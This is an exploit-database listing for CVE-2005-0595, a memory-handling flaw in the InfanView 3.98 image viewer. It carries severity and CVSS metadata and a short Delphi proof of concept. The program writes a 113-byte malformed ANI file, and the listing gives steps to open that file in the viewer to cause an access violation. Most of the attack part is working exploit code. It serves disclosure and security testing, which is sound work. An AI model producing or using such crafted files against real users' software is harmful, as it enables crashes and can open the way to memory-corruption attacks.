Advertisement






InfanView 3.98 (with plugins) - Access violation at processing images ANI files

CVE Category Price Severity
CVE-2005-0595 CWE-119 $500 High
Author Risk Exploitation Type Date
skylined High Remote 2006-09-02
CPE PURL
cpe:cpe:/a:infanview:infanview:3.98 pkg:No PURL package manager URL provided for this exploit
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080166

Below is a copy:

Example (in Delphi):

===============ani.dpr===============

program ani;

{$APPTYPE CONSOLE}

const

FileName='file.ani';

Len=113;

Buf=#$52#$49#$46#$46#$00#$00#$00#$00#$41#$43#$4F#$4E#$00#$00#$00#$00#$24
#$00+

#$00#$00#$24#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00
#$00+

#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00
#$00+

#$4C#$49#$53#$54#$00#$00#$00#$00#$66#$72#$61#$6D#$69#$63#$6F#$6E#$00#$00
#$00+

#$00#$00#$00#$00#$00#$01#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$02
#$00+

#$16#$00#$00#$00#$28#$00#$00#$00#$FF#$FF#$FF#$00#$02#$00#$00#$00#$00#$00
#$01;

var

F:File;

I:Byte;

begin

AssignFile(F,FileName);

Rewrite(F,1);

BlockWrite(F, Buf, Len);

CloseFile(F);

end.

===============ani.dpr===============

1) Compile and Run "ani.dpr" with Delphi

2) Open "file.ani" with InfanView

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum